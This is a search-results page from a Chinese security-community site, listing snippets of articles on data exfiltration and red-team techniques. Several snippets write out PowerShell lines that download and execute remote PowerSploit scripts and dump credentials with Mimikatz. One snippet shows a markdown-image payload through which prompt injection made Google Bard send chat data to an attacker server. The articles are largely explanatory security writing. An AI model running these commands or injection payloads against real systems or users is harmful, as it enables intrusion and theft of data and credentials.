首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全攻防

    Exploit Leads to Data Exfiltration

    Reference: https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration = "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration = "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration

    1.4K30编辑于 2022-09-07
  • 来自专栏FreeBuf

    利用企业邮件系统构造命令控制(C&C)和数据窃取(Exfiltration)通道的思路探讨

    本文通过对高度安全环境中,渗透入侵完成后,传统的基于Web和DNS管理控制目标系统不可行条件下,利用企业网页邮箱系统进行命令控制(C&C)和数据窃取(Exfiltration)的一种思路分享探讨 可以构造这样一种C&C通道: C&C通道 在该企业用户电子邮箱的垃圾箱文件夹内设置特殊格式消息文件,恶意软件通过读取这种消息文件信息,执行我们的控制命令; 当然,也可以构造一种类似的数据窃取(exfiltration 尽管技术上看似简单,但很难从所有合法网络流量中识别出C&C和Exfiltration方式流量。 subject)和来源(from)信息,并具有一个名为ps.txt的附件: 最终,攻击者只需简单地下载该文件并删除垃圾文件夹内信息,就能以这种“暗度陈仓”的方式实现C&C命令控制和数据窃取(Exfiltration

    2.3K100发布于 2018-02-24
  • 来自专栏机器之心

    谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

    原博客链接:https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/? [Data Exfiltration in Progress](https://wuzzi.net/logo.png? goog=[DATA_EXFILTRATION]) 这将呈现为 HTML 图像标记,其 src 属性指向 attacker 服务器。 goog=[DATA_EXFILTRATION]"> 浏览器会自动连接到 URL,无需用户交互即可加载图片。 参考链接: https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?

    88210编辑于 2023-11-22
  • 来自专栏FreeBuf

    Shennina:一款带有人工智能的自动化主机渗透工具

    /exfiltration-server/agent.sh Windows ./exfiltration-server/agent.ps1 过滤服务器-运行 $ cd . /exfiltration-server/ $ ./run-server.sh MSFRPCD服务器 ./scripts/run-msfrp.py 运行服务扫描 $ .

    1.4K31编辑于 2023-02-10
  • 来自专栏python3

    利用python搭建Powersploit

    在客户端加载服务端脚本并执行(IEX远程下载脚本执行) powershell加载iex(New-Object Net.WebClient).DownloadString('http://192.168.10.4/Exfiltration 还有一种可以直接把脚本文件下载下来的方式 $client=new-object System.Net.WebClient $client.DownloadFile(‘http://192.168.8.135/Exfiltration

    80610发布于 2020-01-23
  • 来自专栏漏斗社区

    工具| PowerShell的内网渗透之旅(二)

    CodeExecution 在目标主机执行代码 ScriptModification 在目标主机上创建或修改脚本代码 Persistence 后门脚本(持久性控制) AntivirusBypass 发现杀软查杀特征 Exfiltration 在目标主机上进行信息搜集 Mayhem 蓝屏等破坏性脚本 Privesc 在目标主机中用于提权 Recon 以目标主机为跳板进行内网信息侦查 本次将会展示CodeExecution模块、Recon模块、Exfiltration Exfiltration模块 a.调用Get-Keystrokes记录用户的键盘输入。 1).通过IEX下载并调用Get-Keystrokes。 ? ?

    2.2K60发布于 2018-05-15
  • 来自专栏FreeBuf

    IPv6teal:使用IPV6 covert channel进行隐蔽的数据渗透

    exfiltration脚本每20比特数据发送1个IPv6数据包,receiver脚本通过读取该字段重建数据。 如果你要传输敏感数据,最好在将数据提供给exfiltration脚本之前对客户端的数据进行加密。 它可以处理大文件吗? 可能不行。也许。无论如何它会很慢。 为什么脚本需要以root身份运行? 尝试增加exfiltration脚本的--packet-sending-interval-ms参数值。默认情况下为10毫秒,这意味着程序在发送每个新数据包之前会等待10毫秒。

    96430发布于 2019-08-26
  • 来自专栏Gamma安全实验室

    红队技巧-导出凭据和密码

    Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration

    2.8K10发布于 2021-03-10
  • 来自专栏FreeBuf

    防范数据窃取从了解其手法做起

    Old-school port knocking(端口敲门)也是一种选择:https://www.sans.org/reading-room/whitepapers/covert/portknockout-data-exfiltration-port-knocking-udp https://blog.didierstevens.com/2018/01/20/quickpost-data-exfiltration-with-tor-browser-and-domain-fronting https://www.sans.org/reading-room/whitepapers/covert/skype-data-exfiltration-34560 NTP和BGP协议通常也被允许,可以滥用它们来泄露数据 https://www.darknet.org.uk/2016/11/pyexfil-python-data-exfiltration-tools/ 远程桌面通常可用于映射磁盘和剪贴板,即便被限制,我们也可以使用

    72830发布于 2018-08-21
  • 来自专栏HACK学习

    干货 | ATT&CK渗透测试手册

    Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) 八、lateral-movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration

    3.4K40发布于 2020-02-17
  • 来自专栏FreeBuf

    剧透Black Hat 2017将要发布的8款安全工具

    Data Exfiltration Through Cloud AV Sidechannel 展示嘉宾:Amit Klein和Itzik Kotler。 他们将借助该款工具将为大家展示“渗漏(exfiltration)”技术,即使是在有着严格出口过滤保护的高安全性端点,也能成功实施攻击。

    77940发布于 2018-02-28
  • 来自专栏雨落秋垣

    蜜罐系统配置与攻击者绕圈策略实现方案

    classBehaviorAnalyzer:def__init__(self):self.attack_patterns={'bruteforce':0,'exploit_attempt':0,'data_exfiltration exploit_attempt']+=1return"exploit_attempt"elif"wget"incommandor"curl"incommand:self.attack_patterns['data_exfiltration ']+=1return"data_exfiltration"returnNonedefget_response_strategy(self):"""根据攻击模式调整响应策略"""ifself.attack_patterns

    36020编辑于 2025-10-16
  • 来自专栏机器之心

    USENIX Sec'25 | LLM提示词注入攻击如何防?UC伯克利、Meta最新研究来了

    for-large-language-model-applications [2] https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration [3] https://promptarmor.substack.com/p/data-exfiltration-from-slack-ai-via [4] https://thehackernews.com

    81900编辑于 2025-02-14
  • 来自专栏TeamsSix的网络空间安全专栏

    内网学习笔记 | 密码抓取

    System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration System.Net.Webclient).DownloadString('https://ghproxy.com/raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration security.hiv 或者使用 ninjacopy 脚本,下载地址:https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration

    2.8K10编辑于 2022-09-20
  • 来自专栏小白安全

    WinPayloads:一个可以绕过安全检查的Windowspayload生成器

    Invoke-Mimikatz: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

    1.2K90发布于 2018-04-16
  • 来自专栏网络安全自修室

    获取Windows系统密码凭证总结

    :logonpasswords" "exit" 远程加载 远程脚本下载地址[6]: https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration gentilkiwi/mimikatz/releases*[15] [14]远程脚本下载地址:*https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration

    2.1K10编辑于 2024-03-06
  • 来自专栏HACK学习

    浅谈PowerShell在渗透测试中的应用

    Get-SecurityPackages 四、绕过杀毒软件(AntivirusBypass) Find-AVSignature 五、信息收集(Exfiltration) 这个文件夹主要是收集目标主机上的信息

    3.1K20发布于 2019-08-07
  • 来自专栏深度学习与python

    新手用ChatGPT仅需数小时轻松构建零日漏洞,69家专业公司都检测不出来:“不仅能调用开源库,还能彻底重写源代码”

    参考链接: https://www.theregister.com/2023/04/04/chatgpt_exfiltration_tool/ https://www.forcepoint.com/blog /x-labs/zero-day-exfiltration-using-chatgpt-prompts 声明:本文为 InfoQ 翻译整理,未经许可禁止转载。

    77730编辑于 2023-04-10
  • 来自专栏公共互联网反网络钓鱼(APCN)

    信息窃取器隐蔽机制、数据泄露路径与纵深防御体系研究

    本文将严格基于技术事实,从信息窃取器的定义与分类入手,详细阐述其工作原理与数据 exfiltration 机制,分析其在现代网络环境下的演化趋势,并提出包含技术检测、响应处置及用户意识提升在内的综合防御策略 2.4 数据 exfiltration 与C2通信数据搜集完成后,信息窃取器需要将数据包发送至攻击者控制的C2服务器。为了规避网络防火墙和入侵检测系统(IDS)的拦截,这一过程采用了多种隐蔽技术。 整个 exfiltration 过程可能在几分钟内完成,留给防御者的响应窗口极短。3. 威胁演化与检测难点分析3.1 商业化与MaaS模式的泛滥信息窃取器威胁加剧的根本原因在于其商业模式的成熟。 本文通过对信息窃取器全生命周期的深度剖析,揭示了其从初始入侵到数据 exfiltration 的完整链条,并指出了当前防御体系中的薄弱环节。研究表明,单纯依赖特征码匹配已无法有效遏制此类威胁。

    8810编辑于 2026-03-11
  • 来自专栏FreeBuf

    遨游浏览器把全球用户的这些数据偷偷传回了北京服务器

    他们将内部LAN连接到Fidelis Network平台,监视整个网络,每天查看相关违反DLP.sendfiles.exfiltration规则的情况——这里这个什么规则,是SOC监视是否有文档通过HTTP 上面这张截图来自Fidelis平台的事件分析控制台,里面出现了一个警告,警告内容为存在违反DLP.sendfiles.exfiltration规则的情况,有数据偷偷发往位于中国的服务器。

    1.3K90发布于 2018-02-08
领券